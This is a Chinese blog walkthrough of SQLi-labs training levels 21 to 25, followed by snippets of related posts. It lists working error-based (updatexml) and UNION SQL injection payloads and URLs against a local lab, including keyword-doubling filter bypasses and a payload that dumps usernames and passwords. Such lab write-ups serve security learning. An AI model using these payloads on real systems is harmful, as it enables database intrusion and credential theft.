sqlilabs less21-25关手工注入

已于 2024-08-22 21:32:45 修改
阅读量1.1k 收藏 24
点赞数 38
文章标签: 数据库 mysql
于 2024-08-22 21:31:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75036923/article/details/141434570
版权

第21关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

')and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

 

五.查列,先进行编码

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

 六.查询users表中所有数据

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第22关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

"and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

五.查列,先进行编码

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第23关

一.看有无回显点

二查询数据库

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271

三.查表

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271

四.查列

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271

第24关

使用二次注入

一.注册用户

 二.admin的密码被修改为777777

第25关

一.闭合方式为 单引号 '

http://127.0.0.1/Less-25/?id=1%27%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=1%27%20--+

二.查询数据库

http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+

三. 查询库中所有表

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+

四.查询列

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+

生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 492
sql-lib项目,本篇文章介绍21-25。 闭合变成了双引号,其余和上一一样。 这一过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 272
sql注入
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21,SQLI-LABS第二十一sqlilabs二十一
sqli-labs less21
qq_45106794的博客
10-26 343
#sqli-labs less 19 这一大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
【sql注入Less21-25a
lyy0xfff的博客
07-16 256
SQL注入PrefaceLess-21Less-22Less-23Less-25Less-25a Preface 由于前面20我已经做完了,所以后面的个别卡只提供一个思路或者如何绕过防御以及证明注入点存在即可,思路都是Less-1我们学的子查询语句 Less-21 0x00 由题目得知这是一道Cookie注入的题目,且cookie被编码成base64的编码格式。 什么是base64编码呢 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进
sqlilabs less21-25手工注入
最新发布
03-22
</think>### SQLILabs Less-21Less-25手工注入解析 #### 一、Less-21:Cookie注入+Base64编码 1. **注入点定位**:通过Cookie参数`uname`传递,数据经过Base64编码[^3]。 2. **闭合方式**:单引号闭合,需构造如...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1809
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs less-16 post提交dnslog注入
wanggonghanfei的博客
10-07 1176
sqli-labs less-16 post提交dnslog注入
​Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2268
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
SQL注入实例(sqli-labs/less-8)
Thewei666的博客
08-05 423
确定闭合字符为单引号,并且正确页面与错误页面的显示不同。
Sqli-labs之Less-20和Less-21Less-22
m0_46315342的博客
06-04 471
                                          &nbs...
SQLi-LABS的Less21-30分析
haoahaoahaoahao的博客
02-29 905
id=1'))报错,加入注释符--+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//'?id=1' or 1=1 or'显示正常了,?id=1') or 1=1 or'或者?id=1')) or 1=1 or'报错,那么注入点为'输入语句。被过滤的字符,可用其他的字符进行替代,用"%a0"或"%0b"替代空格,用"||"替代"or",使用"%26%26"替代"and"id=1")%0Bor%0B("1")=("1报错,?id=1"%0bor%0b"1"="1正常。
Sqli-Lab | Less 21-23
酉酉的博客
02-08 625
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
SQL注入实操二(SQLilabs Less21-40)
wutiangui的博客
07-24 449
到目前为止,我总结了一下出现过的轮子,可以得出一个结论,首先需要知道有几个参数,前面6种都是单参数的,多参数的只能通过报错信息得知,用–+还是#也要看报错情况n可以是1,-1,n’后面可接),select后面看情况设置显示位② ')–+)可选,'可换成"③ ‘) --+()可换成)),(可换成((,‘可换成"④ " --+或’ #或’ --+
SQLI LABS | Less-25 GET-Error Based-All Your OR & AND Belong To Us-String Single Quote
Blue17 の 小窝
11-02 460
可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,SQLI LABS Less-25 GET-Error Based-All Your OR & AND Belong To Us-String Single Quote 成功过。用户的登录名与登录密码。作为参数进行查询,那我们就按它的意思传入。可以看到,服务器返回了对应。要我们输入一个数字型的。
sql注入练习之——sqli-labs 1-25
wsnbbz的博客
02-10 3076
第一注入点:‘连接的字符串 数据脱库: -1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- - 第二注入点:数值型 数据脱库: -1 union select 1,(select group_concat(concat_ws(0x7e,username,...
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1719
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
手工)【sqli-labs25-25a】报错注入、OR&AND过滤后注入
07-12 1094
【SQL-过滤后注入
sqli-labs 25-30 超详细
m0_64361111的博客
03-18 1136
25 输入?id=1’报错 ?id=1’--+ 正常回显 说明存在字符型注入 输入and 1=1 发现and被过滤 输入order by 发现 or 被过滤 由于不能使用or和and ,所以直接使用联合查询 3正常 4报错 ,说明只有三个字段 回显位是2 和3 然后就可以套用payload了 /?id=-1’union select 1,2,database()--+ // 获取数据库名 /?id=-1’union select 1,2,gr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值